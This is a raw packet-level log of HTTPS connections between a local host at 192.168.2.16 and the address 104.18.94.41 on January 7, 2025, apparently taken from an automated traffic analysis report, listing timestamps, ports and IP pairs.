                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322484016 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322508097 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322515965 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322547913 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322587967 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322596073 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322637081 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322642088 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322894096 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322943926 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322943926 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322954893 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.322999001 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323005915 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323055029 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323081970 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323097944 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323106050 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323184013 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323350906 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323396921 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323472023 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323834896 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323848963 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323865891 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323898077 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323955059 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.323992968 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324001074 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324011087 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324045897 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324052095 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324089050 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324095011 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324872971 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324908972 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324928999 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324934959 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324982882 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.324986935 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.325058937 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.325160980 CET49738443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.325176001 CET44349738104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.707763910 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.708066940 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.708085060 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.708416939 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.708724022 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.708789110 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.708874941 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.751333952 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.789745092 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.790013075 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.790029049 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.790385008 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.790684938 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.790749073 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.790883064 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.835340977 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850326061 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850377083 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850424051 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850426912 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850440979 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850476980 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850486994 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850514889 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850545883 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850563049 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850570917 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850610971 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.850668907 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.854856014 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.854919910 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.854928970 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.903578043 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.903584957 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.932224989 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.932290077 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.932379007 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.933063984 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.933085918 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.935785055 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.935810089 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.935899019 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.936156034 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.936166048 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940156937 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940190077 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940233946 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940242052 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940275908 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940279007 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940288067 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940326929 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940334082 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940363884 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940391064 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940417051 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940423012 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.940495968 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941168070 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941354036 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941390038 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941401005 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941409111 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941448927 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941452980 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941459894 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941494942 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941550016 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941562891 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.941606998 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.942260981 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.942316055 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.942338943 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.942363977 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.942382097 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.942389965 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.942409992 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.983563900 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.983577967 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.985815048 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.986491919 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:34.986500978 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.030569077 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.030689001 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.030777931 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.030822992 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.030850887 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.030859947 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031138897 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031147003 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031317949 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031373024 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031378984 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031405926 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031430960 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031436920 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031459093 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031759024 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031836033 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031843901 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031905890 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031963110 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.031970024 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032044888 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032634020 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032677889 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032695055 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032700062 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032727957 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032751083 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032757998 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.032804966 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033586025 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033647060 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033651114 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033657074 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033693075 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033696890 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033710957 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033740044 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033756971 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033765078 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.033812046 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.034606934 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.034666061 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.076134920 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.076205969 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121324062 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121371031 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121402025 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121417999 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121429920 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121443033 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121503115 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121520042 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121637106 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.121637106 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.124474049 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.124509096 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.124635935 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.124855042 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.124870062 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.267199039 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.267242908 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.267810106 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.268012047 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.268030882 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.407819033 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.408711910 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.408727884 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.409069061 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.409511089 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.409580946 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.409646034 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.430697918 CET49740443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.430718899 CET44349740104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.451330900 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.463701963 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.542911053 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.542983055 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.543876886 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.543876886 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.606779099 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.615477085 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.615515947 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.615901947 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.642904997 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.643006086 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.647697926 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.691344976 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.705722094 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.739661932 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.745063066 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.745090008 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.745837927 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.747402906 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.747402906 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.747421980 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.747471094 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.747514009 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.747555017 CET44349744104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758672953 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758718014 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758765936 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758796930 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758799076 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758819103 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758843899 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758856058 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758893013 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758924007 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758955002 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.758985996 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.759005070 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.759020090 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.759154081 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.763917923 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.764256954 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.801996946 CET49744443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.845623970 CET49742443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.845647097 CET44349742104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849128008 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849179029 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849210978 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849237919 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849248886 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849267006 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849292994 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849391937 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849421978 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849448919 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849689960 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.849699020 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850280046 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850311995 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850342989 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850388050 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850411892 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850411892 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850421906 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.850677013 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.851074934 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.851252079 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.851280928 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.851501942 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.851511002 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.851838112 CET49743443192.168.2.16104.18.94.41
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.851964951 CET44349743104.18.94.41192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:35.852133036 CET44349743104.18.94.41192.168.2.16
